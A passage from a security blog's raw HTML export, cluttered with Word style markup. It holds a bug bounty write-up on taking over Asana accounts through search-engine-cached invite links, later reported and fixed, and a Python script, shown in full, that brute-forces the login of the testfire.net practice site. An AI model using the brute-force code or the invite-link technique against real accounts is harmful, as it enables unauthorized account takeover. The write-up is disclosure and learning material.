UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Cambria;
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<!--StartFragment-->
<!--EndFragment--><br />
<div class="MsoNormal">
<br /></div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-9276138961898324602013-10-09T12:12:00.000-07:002014-10-21T22:46:47.027-07:00Hijack User accounts via cached Invite links! #Asana #bugbounty<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">A few weeks back a friend of mine mentioned to me about Asana's
bug bounty program. Although I did not see any mention of reward money in their
security page I still thought of giving it a try. After reading a little about the company I found that <a href="http://www.asana.com/">www.asana.com</a> is a portal where a team can
share the resources and organize its work i.e. kind of a project
management software. </span></span></span><br />
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">I created an account and started poking around and checked for obvious
vulnerabilities such as XSS and CSRF. The application appeared to be decent but there
was always some scope for a few logical vulnerabilities.</span></span></span></div>
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">The application allowed creation of new projects followed by addition of new users by sending them invite links. </span></span></span><br />
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"></span></span></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">These invite links looked like these (<span style="color: #1f8dd6;">https://app.asana.com/app/asana/-/register?invite=</span>XXXXXX),
so I thought of trying my luck with these links. </span></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"></span></span></span></div>
</div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8jIzKb9iVjJ2NgL8tqv4DGdbaiYd3qNK2R2Yal_ubp63YHzAdSFHbm0UIepaFPG5tVg-Bl1rqEsxGrkOgOBqmB7sZBmqiWmKIcLRrRnd-LGEuMy8otKSPdjpFUxwC5jdKIb8kG8zjUw/s1600/adduser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8jIzKb9iVjJ2NgL8tqv4DGdbaiYd3qNK2R2Yal_ubp63YHzAdSFHbm0UIepaFPG5tVg-Bl1rqEsxGrkOgOBqmB7sZBmqiWmKIcLRrRnd-LGEuMy8otKSPdjpFUxwC5jdKIb8kG8zjUw/s320/adduser.png" height="171" width="320" /></a></div>
<br />
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;">By using a few Google dorks I was able to get a list of invite links
which were cached by Google and to my surprise they were still active. </span></span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLl7JBvVLclFOdskG0ROvyEBTm7Bgoz3VvrsweJpc1urBHaOXsEaXm91zEyjow11iv-8AYxkvnlMhluizQjqItTD_IbobhizwdKajiA59crAUaGAGDLvVsyGWdkd6s-jk_W2sAzuXReGg/s1600/Dork-output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLl7JBvVLclFOdskG0ROvyEBTm7Bgoz3VvrsweJpc1urBHaOXsEaXm91zEyjow11iv-8AYxkvnlMhluizQjqItTD_IbobhizwdKajiA59crAUaGAGDLvVsyGWdkd6s-jk_W2sAzuXReGg/s320/Dork-output.png" height="180" width="320" /></a></div>
<br />
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"> So I collected
a list of cached invite links and tried creating an account and voila!! it worked
smoothly as I expected. I was able to login into a valid user account by creating a new password. </span></span></span><br />
<br />
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"></span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXvp0WC2-U9Idqw6C2NRxgWT9hj_qilFS3qgoNX45nGWxgrf988iv14MEalBBqu7Ow4gI1MrKVkCicGKLDUZiLU2_e1ACoied16tIbsAD6vou6HKAWe-KexVMIOf5nb4-_Npecgpq7kyM/s1600/RandomUser1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXvp0WC2-U9Idqw6C2NRxgWT9hj_qilFS3qgoNX45nGWxgrf988iv14MEalBBqu7Ow4gI1MrKVkCicGKLDUZiLU2_e1ACoied16tIbsAD6vou6HKAWe-KexVMIOf5nb4-_Npecgpq7kyM/s320/RandomUser1.png" height="180" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZAN7gKeqXP7BP-B66VPyGxm8SAwJ2efB1TvC-66jhdM_Mh6LgPxpZ-oyaQ1mA8Z1SCRlp19d8XWuVJRv3Htq6DrYRhXRZqb-4_gsKx-is8pZ2g3Oz5dzyrQwUTUtUdvHHJLLdypAid_0/s1600/RandomUser2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"></span></span></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
</div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"></span></span></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/muDW2OVVFdE?feature=player_embedded' frameborder='0'></iframe></div>
</div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
</div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span style="color: black;"><br /></span></span></span></div>
<div class="MsoBodyText">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><span lang="EN-GB">I reported this issue to asana security team and they were very quick in responding to my emails. The issue got fixed within no time
and they rewarded me for the same.</span></span></span></div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-9962812550439091012013-10-01T10:57:00.004-07:002014-10-21T23:09:22.541-07:00My lazy attempt towards python! #BeautifulSoup #Requests<div dir="ltr" style="text-align: left;" trbidi="on">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><span style="background: white; color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">Inspired by the amazing <a href="http://null.co.in/"><span style="color: #5b627f;">null</span></a> humla
session that I attended I thought of writing my own simple login-brute-force in
python using requests. There are a lot of brute-forcing scripts in the market
but I thought of writing my own.</span><br />
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">I love the <a href="http://docs.python-requests.org/en/latest/"><span style="color: #5b627f;">Requests</span></a> library
for python, as the author says "Its HTTP for Humans" it actually is.
I really encourage using this library at least once if one wants to
start learning python web scraping.</span><span style="font-family: "Times New Roman","serif"; mso-ansi-language: EN-US; mso-fareast-font-family: "Times New Roman";"></span></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">I have also used <a href="http://www.crummy.com/software/BeautifulSoup/"><span style="color: #5b627f;">BeautifulSoup </span></a>library
to extract few HTML tags. The website which I have used is <a href="http://www.testfire.net/">http://www.testfire.net</a>,
which is a vulnerable bank application developed by IBM for web app testing.</span></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">The script is used to brute force all
possible passwords against a single user name "admin". I initially
tried writing it with cookiejar but some how the code got little lengthier but then Requests came to my rescue.</span></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="color: black; font-family: "Verdana","sans-serif"; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-fareast-font-family: "Times New Roman";">The script opens a file called
'password.txt' containing a list of random passwords to brute force. In this
case the correct password is "admin", with<span style="background: white;"> Requests library it is possible to intercept the request in a proxy before
hitting the server. Here I am running a proxy on port 8082 just to see the data
what my script is sending.Feel free to use the script
(for learning purpose only), here is the gist <a href="https://gist.github.com/prajal/6782604" target="_blank">link</a>.</span></span><br />
<br /></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 4;">
<b><span style="color: #464646; font-family: "Courier New"; font-size: 8.5pt; mso-ansi-language: EN-US; mso-fareast-font-family: "Times New Roman";">#Author: Prajal Kulkarni</span></b></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 4;">
<b><span style="color: #464646; font-family: "Courier New"; font-size: 8.5pt; mso-ansi-language: EN-US; mso-fareast-font-family: "Times New Roman";">import requests</span></b><br />
<b><span style="color: #464646; font-family: "Courier New"; font-size: 8.5pt; mso-ansi-language: EN-US; mso-fareast-font-family: "Times New Roman";">import sys<br />
from bs4 import BeautifulSoup as BS</span></b><br />
<b><span style="color: #464646; font-family: "Courier New"; font-size: 8.5pt; mso-ansi-language: EN-US; mso-fareast-font-family: "Times New Roman";"><br />
proxyDict = {"http":"127.0.0.1:8082"}<br />
<br />
url = "http://www.testfire.net/bank/login.aspx"<br />
<br />
def connect(url,m):<br />
t =
requests.post("http://www.testfire.net/bank/login.aspx", data=m,
proxies=proxyDict)<br />
print t.text<br />
soup = BS(t.text)<br />
a=soup.find('a',
id="_ctl0__ctl0_Content_AccountLink")<br />
x = str(a.string)<br />
print x<br />
if x == "MY ACCOUNT" :<br /> print "The pass is" + " " + m['passw']<br /> sys.exit()<br /> else:<br /> print "Password %s not working" %m['passw']<br />
<br />
def controller():<br />
m = {}<br />
f=open('password.txt','r').read().split('\n')<br />
for line in f:<br />
m["uid"] =
"admin"<br />
m["passw"] =
str(line)<br />
m["btnSubmit"]
= "Login"<br />
print m<br />
connect(url,m)<br />
<br />
controller()</span></b><b><span style="color: black; font-family: "Tahoma","sans-serif"; font-size: 8.5pt; mso-ansi-language: EN-US; mso-fareast-font-family: "Times New Roman";"></span></b></div>
<div class="MsoNormal" style="background: white; line-height: normal; margin-bottom: 13.5pt; mso-margin-top-alt: auto;">
<br /></div>
<div class="MsoNormal" style="background: white; line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<br /></div>
<div class="MsoNormal">
<br /></div>
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" SemiHidden="false" UnhideWhenUsed="false"
QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Body Text"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
